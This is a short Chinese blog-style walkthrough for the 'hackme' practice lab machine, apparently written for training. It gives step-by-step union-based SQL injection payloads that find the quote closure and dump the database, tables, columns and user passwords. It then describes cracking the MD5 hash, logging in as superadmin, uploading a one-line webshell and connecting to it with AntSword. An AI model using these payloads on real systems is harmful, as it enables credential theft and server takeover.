本文主要是介绍hackme靶机通关攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1、登录靶机,查询是否有注入点
2、判断闭合方式
输入OSINT' and 1=1 #
输入OSINT' and 1=2 #
得出闭合方式为单引号
2、查询数据库名
输入-1' union select database(),2,3 #
3、查询数据库中的表
输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
4、查询users表中的列
输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#
5、查询users表中所有信息
输入-1' union select group_concat(user),group_concat(pasword),3 from users #
得到一个superadmin的账号密码,
6、使用MD5将密码解密
7、使用解密后的密码进行登录
8、尝试上传一句话木马文件
9、上传成功后使用蚁剑进行链接
这篇关于hackme靶机通关攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!